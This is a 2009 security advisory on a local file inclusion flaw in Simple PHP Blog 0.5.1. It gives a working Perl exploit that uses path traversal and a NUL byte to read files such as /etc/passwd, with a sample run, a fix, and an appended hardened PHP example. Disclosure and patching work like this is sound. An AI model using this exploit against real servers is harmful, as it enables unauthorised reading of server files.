=============================================
INTERNET SECURITY AUDITORS ALERT 2009-005
- Original release date: March 2nd, 2009
- Last revised: December 18th, 2009
- Discovered by: Juan Galiana Lara
- Severity: 6.8/10 (CVSS scored)
=============================================

I. VULNERABILITY
-------------------------
Simple PHP Blog <= 0.5.1 Local File Include vulnerability

II. BACKGROUND
-------------------------
Simple PHP Blog is a blog system that does not require a database setup and is very easy to install.

III. DESCRIPTION
-------------------------
Simple PHP Blog <= 0.5.1 is affected by a Local File Include vulnerability in 'languages_cgi.php' because the 'blog_language1' parameter is not properly sanitized.

IV. PROOF OF CONCEPT
-------------------------
The affected code (line 62 of languages_cgi.php):

    require_once('languages/' . $_POST[ 'blog_language1' ] . '/strings.php');

Exploit:

    #!/usr/bin/perl
    # Local File Include Exploit
    # Simple PHP Blog <= 0.5.1
    # jgaliana <at> isecauditors=dot=com
    # Internet Security Auditors

    use LWP::UserAgent;
    use HTTP::Request;

    if ($#ARGV < 3) {
        die("Usage: $0 <site> <path> <file> <cookie>");
    }

    $ua = LWP::UserAgent->new;
    $ua->agent("Simple PHP Blog Exploit ^_^");
    $ua->default_header('Cookie' => "sid=$ARGV[3]");

    my $req = new HTTP::Request POST => "http://$ARGV[0]$ARGV[1]/languages_cgi.php";
    $req->content_type('application/x-www-form-urlencoded');
    $req->content("blog_language1=../../../../..$ARGV[2]%00");

    my $res = $ua->request($req);

    if ($res->is_success) {
        print $res->content;
    } else {
        print "Error: " . $res->status_line, "\n";
    }

Sample run:

    $ perl simple.pl example.com /blog /etc/passwd <my_cookie_here> | head -1
    root:*:0:0:root:/root:/bin/bash

The bug can be exploited with or without 'magic_quotes_gpc'. If magic_quotes_gpc is set to Off, an attacker can read any file (for example /etc/passwd) by appending a '\0' character; if it is On, only PHP files can be included, which still allows execution of any local PHP file.

V. BUSINESS IMPACT
-------------------------
The impact is that an attacker can read arbitrary files in the context of the web server and execute arbitrary local PHP scripts.

VI. SYSTEMS AFFECTED
-------------------------
Versions prior to and including 0.5.1 are affected. In order to patch the application, the functions file_exists() and basename() must be added to the affected code.

VII. SOLUTION
-------------------------
Change line 62 of languages_cgi.php in order to filter the $_POST[ 'blog_language1' ] variable:

    if (ereg('^[a-zA-Z0-9_]+$', $_POST[ 'blog_language1' ]))
        require_once('languages/' . $_POST[ 'blog_language1' ] . '/strings.php');

VIII. REFERENCES
-------------------------
http://www.simplephpblog.com
http://sourceforge.net/projects/sphpblog/
http://www.isecauditors.com

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
March 02, 2009: Initial release.
December 18, 2009: Last revision.

XI. DISCLOSURE TIMELINE
-------------------------
March 02, 2009: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
March 03, 2009: Notified to developer. No response.
December 13, 2009: Notified again. No response.
December 18, 2009: Added mitigation solution and sent to lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.
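The vulnerable include from section IV placed beside a hardened form of the fix from section VII, as an added example that is not code from the advisory or from the Simple PHP Blog project. It assumes a languages/ directory with one subdirectory per language (e.g. languages/en/strings.php); the function names and the $base parameter are hypothetical, and preg_match() stands in for the ereg() call of the original fix, which later PHP versions removed.

```php
<?php
// Added example, not code from the advisory or from Simple PHP Blog:
// the vulnerable include pattern from languages_cgi.php next to a
// hardened replacement. Assumes a languages/ directory with one
// subdirectory per language (e.g. languages/en/strings.php); function
// names and the $base parameter are hypothetical.

// Vulnerable pattern (advisory line 62): the POST value is concatenated
// straight into the include path, so "../../../../../etc/passwd\0" walks
// out of languages/ and, where PHP honoured NUL bytes in paths, the
// trailing "/strings.php" is cut off.
function strings_path_vulnerable(string $lang): string
{
    return 'languages/' . $lang . '/strings.php';
}

// Hardened version: allowlist the identifier (preg_match() in place of
// the advisory's deprecated ereg()), then confirm the resolved file
// really exists below the languages directory (defence in depth).
function strings_path_safe(string $lang, string $base = __DIR__ . '/languages'): ?string
{
    if (!preg_match('/^[A-Za-z0-9_]+$/', $lang)) {
        return null;                 // rejects "..", "/", "\0", etc.
    }
    $baseReal = realpath($base);
    $fileReal = realpath($base . '/' . $lang . '/strings.php');
    if ($baseReal === false || $fileReal === false) {
        return null;                 // unknown language or missing file
    }
    if (strpos($fileReal, $baseReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;                 // symlink or other escape from languages/
    }
    return $fileReal;
}

// Constructed inputs: a legitimate language name and the advisory's payload.
foreach (['en', "../../../../../etc/passwd\0"] as $in) {
    $shown = str_replace("\0", '\0', $in);
    printf("%-30s vulnerable => %s\n", $shown,
           str_replace("\0", '\0', strings_path_vulnerable($in)));
    printf("%-30s hardened   => %s\n", $shown, strings_path_safe($in) ?? 'rejected');
}

// In the real handler the include only ever sees a vetted path:
// $path = strings_path_safe($_POST['blog_language1'] ?? '')
//     ?? __DIR__ . '/languages/en/strings.php';
// require_once $path;
```

Run from the blog root so that languages/en/strings.php resolves; the traversal payload is rejected by the allowlist before realpath() ever sees the NUL byte.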